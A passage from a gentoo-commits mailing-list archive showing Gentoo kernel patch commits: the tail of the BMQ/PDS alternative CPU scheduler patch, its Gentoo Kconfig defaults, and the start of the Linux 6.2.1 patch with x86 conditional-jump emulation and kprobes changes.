++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ 
+ 	return 0;
+ }
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+ 
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+ 
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #else
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+ 
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index 771f8ddb7053..787a5069d69a 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+ 
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3261,4 +3265,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+ 
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 38f3698f5e5b..b9d597394316 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+ 
+ #endif /* CONFIG_SCHEDSTATS */
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+ 
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+ 
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+ 
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+ 
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+ 
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index 137d4abe3eda..6bada3a6d571 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+ 
+ /* Constants used for minimum and maximum */
+ 
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1934,6 +1938,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+ 
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+ 
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+ 
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+ 
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+ 
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+ 
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+ 
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index ff0536cea968..ce266990006d 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1150,10 +1150,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+ 

diff --git a/5021_BMQ-and-PDS-gentoo-defaults.patch b/5021_BMQ-and-PDS-gentoo-defaults.patch
new file mode 100644
index 00000000..6dc48eec
--- /dev/null
+++ b/5021_BMQ-and-PDS-gentoo-defaults.patch
@@ -0,0 +1,13 @@
+--- a/init/Kconfig	2023-02-13 08:16:09.534315265 -0500
++++ b/init/Kconfig	2023-02-13 08:17:24.130237204 -0500
+@@ -867,8 +867,9 @@ config UCLAMP_BUCKETS_COUNT
+ 	  If in doubt, use the default value.
+ 
+ menuconfig SCHED_ALT
++	depends on X86_64
+ 	bool "Alternative CPU Schedulers"
+-	default y
++	default n
+ 	help
+ 	  This feature enable alternative CPU scheduler"
+ 


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2-2 commit in: /
@ 2023-02-27  3:48 Alice Ferrazzi
  2023-02-25 11:14 ` [gentoo-commits] proj/linux-patches:6.2 " Alice Ferrazzi
  0 siblings, 1 reply; 30+ messages in thread
From: Alice Ferrazzi @ 2023-02-27  3:48 UTC (permalink / raw
  To: gentoo-commits

commit:     917cccf0b0bf4e9bcf4d5a97c9339c82d3236238
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sat Feb 25 10:58:09 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sat Feb 25 11:14:38 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=917cccf0

Linux patch 6.2.1

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |   4 +
 1000_linux-6.2.1.patch | 552 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 556 insertions(+)

diff --git a/0000_README b/0000_README
index 8bb95e22..46624397 100644
--- a/0000_README
+++ b/0000_README
@@ -43,6 +43,10 @@ EXPERIMENTAL
 Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
+Patch:  1000_linux-6.2.1.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.1
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1000_linux-6.2.1.patch b/1000_linux-6.2.1.patch
new file mode 100644
index 00000000..5ca655c1
--- /dev/null
+++ b/1000_linux-6.2.1.patch
@@ -0,0 +1,552 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 135d93368d36e..f77188f30210f 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -3515,7 +3515,7 @@ F:	drivers/net/ieee802154/atusb.h
+ AUDIT SUBSYSTEM
+ M:	Paul Moore <paul@paul-moore.com>
+ M:	Eric Paris <eparis@redhat.com>
+-L:	linux-audit@redhat.com (moderated for non-subscribers)
++L:	audit@vger.kernel.org
+ S:	Supported
+ W:	https://github.com/linux-audit
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/pcmoore/audit.git
+diff --git a/Makefile b/Makefile
+index 3f6628780eb21..f26824f367a99 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 0
++SUBLEVEL = 1
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/x86/include/asm/text-patching.h b/arch/x86/include/asm/text-patching.h
+index f4b87f08f5c50..29832c338cdc5 100644
+--- a/arch/x86/include/asm/text-patching.h
++++ b/arch/x86/include/asm/text-patching.h
+@@ -184,6 +184,37 @@ void int3_emulate_ret(struct pt_regs *regs)
+ 	unsigned long ip = int3_emulate_pop(regs);
+ 	int3_emulate_jmp(regs, ip);
+ }
++
++static __always_inline
++void int3_emulate_jcc(struct pt_regs *regs, u8 cc, unsigned long ip, unsigned long disp)
++{
++	static const unsigned long jcc_mask[6] = {
++		[0] = X86_EFLAGS_OF,
++		[1] = X86_EFLAGS_CF,
++		[2] = X86_EFLAGS_ZF,
++		[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
++		[4] = X86_EFLAGS_SF,
++		[5] = X86_EFLAGS_PF,
++	};
++
++	bool invert = cc & 1;
++	bool match;
++
++	if (cc < 0xc) {
++		match = regs->flags & jcc_mask[cc >> 1];
++	} else {
++		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
++			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
++		if (cc >= 0xe)
++			match = match || (regs->flags & X86_EFLAGS_ZF);
++	}
++
++	if ((match && !invert) || (!match && invert))
++		ip += disp;
++
++	int3_emulate_jmp(regs, ip);
++}
++
+ #endif /* !CONFIG_UML_X86 */
+ 
+ #endif /* _ASM_X86_TEXT_PATCHING_H */
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 7d8c3cbde3685..81381a0194f39 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -340,6 +340,12 @@ next:
+ 	}
+ }
+ 
++static inline bool is_jcc32(struct insn *insn)
++{
++	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
++	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
++}
++
+ #if defined(CONFIG_RETPOLINE) && defined(CONFIG_OBJTOOL)
+ 
+ /*
+@@ -378,12 +384,6 @@ static int emit_indirect(int op, int reg, u8 *bytes)
+ 	return i;
+ }
+ 
+-static inline bool is_jcc32(struct insn *insn)
+-{
+-	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
+-	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
+-}
+-
+ static int emit_call_track_retpoline(void *addr, struct insn *insn, int reg, u8 *bytes)
+ {
+ 	u8 op = insn->opcode.bytes[0];
+@@ -1772,6 +1772,11 @@ void text_poke_sync(void)
+ 	on_each_cpu(do_sync_core, NULL, 1);
+ }
+ 
++/*
++ * NOTE: crazy scheme to allow patching Jcc.d32 but not increase the size of
++ * this thing. When len == 6 everything is prefixed with 0x0f and we map
++ * opcode to Jcc.d8, using len to distinguish.
++ */
+ struct text_poke_loc {
+ 	/* addr := _stext + rel_addr */
+ 	s32 rel_addr;
+@@ -1893,6 +1898,10 @@ noinstr int poke_int3_handler(struct pt_regs *regs)
+ 		int3_emulate_jmp(regs, (long)ip + tp->disp);
+ 		break;
+ 
++	case 0x70 ... 0x7f: /* Jcc */
++		int3_emulate_jcc(regs, tp->opcode & 0xf, (long)ip, tp->disp);
++		break;
++
+ 	default:
+ 		BUG();
+ 	}
+@@ -1966,16 +1975,26 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * Second step: update all but the first byte of the patched range.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		u8 old[POKE_MAX_OPCODE_SIZE] = { tp[i].old, };
++		u8 old[POKE_MAX_OPCODE_SIZE+1] = { tp[i].old, };
++		u8 _new[POKE_MAX_OPCODE_SIZE+1];
++		const u8 *new = tp[i].text;
+ 		int len = tp[i].len;
+ 
+ 		if (len - INT3_INSN_SIZE > 0) {
+ 			memcpy(old + INT3_INSN_SIZE,
+ 			       text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+ 			       len - INT3_INSN_SIZE);
++
++			if (len == 6) {
++				_new[0] = 0x0f;
++				memcpy(_new + 1, new, 5);
++				new = _new;
++			}
++
+ 			text_poke(text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+-				  (const char *)tp[i].text + INT3_INSN_SIZE,
++				  new + INT3_INSN_SIZE,
+ 				  len - INT3_INSN_SIZE);
++
+ 			do_sync++;
+ 		}
+ 
+@@ -2003,8 +2022,7 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 		 * The old instruction is recorded so that the event can be
+ 		 * processed forwards or backwards.
+ 		 */
+-		perf_event_text_poke(text_poke_addr(&tp[i]), old, len,
+-				     tp[i].text, len);
++		perf_event_text_poke(text_poke_addr(&tp[i]), old, len, new, len);
+ 	}
+ 
+ 	if (do_sync) {
+@@ -2021,10 +2039,15 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * replacing opcode.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		if (tp[i].text[0] == INT3_INSN_OPCODE)
++		u8 byte = tp[i].text[0];
++
++		if (tp[i].len == 6)
++			byte = 0x0f;
++
++		if (byte == INT3_INSN_OPCODE)
+ 			continue;
+ 
+-		text_poke(text_poke_addr(&tp[i]), tp[i].text, INT3_INSN_SIZE);
++		text_poke(text_poke_addr(&tp[i]), &byte, INT3_INSN_SIZE);
+ 		do_sync++;
+ 	}
+ 
+@@ -2042,9 +2065,11 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 			       const void *opcode, size_t len, const void *emulate)
+ {
+ 	struct insn insn;
+-	int ret, i;
++	int ret, i = 0;
+ 
+-	memcpy((void *)tp->text, opcode, len);
++	if (len == 6)
++		i = 1;
++	memcpy((void *)tp->text, opcode+i, len-i);
+ 	if (!emulate)
+ 		emulate = opcode;
+ 
+@@ -2055,6 +2080,13 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	tp->len = len;
+ 	tp->opcode = insn.opcode.bytes[0];
+ 
++	if (is_jcc32(&insn)) {
++		/*
++		 * Map Jcc.d32 onto Jcc.d8 and use len to distinguish.
++		 */
++		tp->opcode = insn.opcode.bytes[1] - 0x10;
++	}
++
+ 	switch (tp->opcode) {
+ 	case RET_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+@@ -2071,7 +2103,6 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 		BUG_ON(len != insn.length);
+ 	}
+ 
+-
+ 	switch (tp->opcode) {
+ 	case INT3_INSN_OPCODE:
+ 	case RET_INSN_OPCODE:
+@@ -2080,6 +2111,7 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	case CALL_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+ 	case JMP8_INSN_OPCODE:
++	case 0x70 ... 0x7f: /* Jcc */
+ 		tp->disp = insn.immediate.value;
+ 		break;
+ 
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 695873c0f50b5..0ce969ae250f7 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -464,50 +464,26 @@ static void kprobe_emulate_call(struct kprobe *p, struct pt_regs *regs)
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call);
+ 
+-static nokprobe_inline
+-void __kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs, bool cond)
++static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (cond)
+-		ip += p->ainsn.rel32;
++	ip += p->ainsn.rel32;
+ 	int3_emulate_jmp(regs, ip);
+ }
+-
+-static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+-{
+-	__kprobe_emulate_jmp(p, regs, true);
+-}
+ NOKPROBE_SYMBOL(kprobe_emulate_jmp);
+ 
+-static const unsigned long jcc_mask[6] = {
+-	[0] = X86_EFLAGS_OF,
+-	[1] = X86_EFLAGS_CF,
+-	[2] = X86_EFLAGS_ZF,
+-	[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
+-	[4] = X86_EFLAGS_SF,
+-	[5] = X86_EFLAGS_PF,
+-};
+-
+ static void kprobe_emulate_jcc(struct kprobe *p, struct pt_regs *regs)
+ {
+-	bool invert = p->ainsn.jcc.type & 1;
+-	bool match;
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (p->ainsn.jcc.type < 0xc) {
+-		match = regs->flags & jcc_mask[p->ainsn.jcc.type >> 1];
+-	} else {
+-		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
+-			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
+-		if (p->ainsn.jcc.type >= 0xe)
+-			match = match || (regs->flags & X86_EFLAGS_ZF);
+-	}
+-	__kprobe_emulate_jmp(p, regs, (match && !invert) || (!match && invert));
++	int3_emulate_jcc(regs, p->ainsn.jcc.type, ip, p->ainsn.rel32);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_jcc);
+ 
+ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ {
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 	bool match;
+ 
+ 	if (p->ainsn.loop.type != 3) {	/* LOOP* */
+@@ -535,7 +511,9 @@ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ 	else if (p->ainsn.loop.type == 1)	/* LOOPE */
+ 		match = match && (regs->flags & X86_EFLAGS_ZF);
+ 
+-	__kprobe_emulate_jmp(p, regs, match);
++	if (match)
++		ip += p->ainsn.rel32;
++	int3_emulate_jmp(regs, ip);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_loop);
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index 2ebc338980bcd..b70670a985978 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -9,6 +9,7 @@ enum insn_type {
+ 	NOP = 1,  /* site cond-call */
+ 	JMP = 2,  /* tramp / site tail-call */
+ 	RET = 3,  /* tramp / site cond-tail-call */
++	JCC = 4,
+ };
+ 
+ /*
+@@ -25,12 +26,40 @@ static const u8 xor5rax[] = { 0x2e, 0x2e, 0x2e, 0x31, 0xc0 };
+ 
+ static const u8 retinsn[] = { RET_INSN_OPCODE, 0xcc, 0xcc, 0xcc, 0xcc };
+ 
++static u8 __is_Jcc(u8 *insn) /* Jcc.d32 */
++{
++	u8 ret = 0;
++
++	if (insn[0] == 0x0f) {
++		u8 tmp = insn[1];
++		if ((tmp & 0xf0) == 0x80)
++			ret = tmp;
++	}
++
++	return ret;
++}
++
++extern void __static_call_return(void);
++
++asm (".global __static_call_return\n\t"
++     ".type __static_call_return, @function\n\t"
++     ASM_FUNC_ALIGN "\n\t"
++     "__static_call_return:\n\t"
++     ANNOTATE_NOENDBR
++     ANNOTATE_RETPOLINE_SAFE
++     "ret; int3\n\t"
++     ".size __static_call_return, . - __static_call_return \n\t");
++
+ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 					  void *func, bool modinit)
+ {
+ 	const void *emulate = NULL;
+ 	int size = CALL_INSN_SIZE;
+ 	const void *code;
++	u8 op, buf[6];
++
++	if ((type == JMP || type == RET) && (op = __is_Jcc(insn)))
++		type = JCC;
+ 
+ 	switch (type) {
+ 	case CALL:
+@@ -57,6 +86,20 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 		else
+ 			code = &retinsn;
+ 		break;
++
++	case JCC:
++		if (!func) {
++			func = __static_call_return;
++			if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
++				func = x86_return_thunk;
++		}
++
++		buf[0] = 0x0f;
++		__text_gen_insn(buf+1, op, insn+1, func, 5);
++		code = buf;
++		size = 6;
++
++		break;
+ 	}
+ 
+ 	if (memcmp(insn, code, size) == 0)
+@@ -68,9 +111,9 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 	text_poke_bp(insn, code, size, emulate);
+ }
+ 
+-static void __static_call_validate(void *insn, bool tail, bool tramp)
++static void __static_call_validate(u8 *insn, bool tail, bool tramp)
+ {
+-	u8 opcode = *(u8 *)insn;
++	u8 opcode = insn[0];
+ 
+ 	if (tramp && memcmp(insn+5, tramp_ud, 3)) {
+ 		pr_err("trampoline signature fail");
+@@ -79,7 +122,8 @@ static void __static_call_validate(void *insn, bool tail, bool tramp)
+ 
+ 	if (tail) {
+ 		if (opcode == JMP32_INSN_OPCODE ||
+-		    opcode == RET_INSN_OPCODE)
++		    opcode == RET_INSN_OPCODE ||
++		    __is_Jcc(insn))
+ 			return;
+ 	} else {
+ 		if (opcode == CALL_INSN_OPCODE ||
+diff --git a/drivers/hid/hid-mcp2221.c b/drivers/hid/hid-mcp2221.c
+index e61dd039354b8..f74a977cf8f87 100644
+--- a/drivers/hid/hid-mcp2221.c
++++ b/drivers/hid/hid-mcp2221.c
+@@ -922,6 +922,9 @@ static void mcp2221_hid_unregister(void *ptr)
+ /* This is needed to be sure hid_hw_stop() isn't called twice by the subsystem */
+ static void mcp2221_remove(struct hid_device *hdev)
+ {
++	struct mcp2221 *mcp = hid_get_drvdata(hdev);
++
++	cancel_delayed_work_sync(&mcp->init_work);
+ }
+ 
+ #if IS_REACHABLE(CONFIG_IIO)
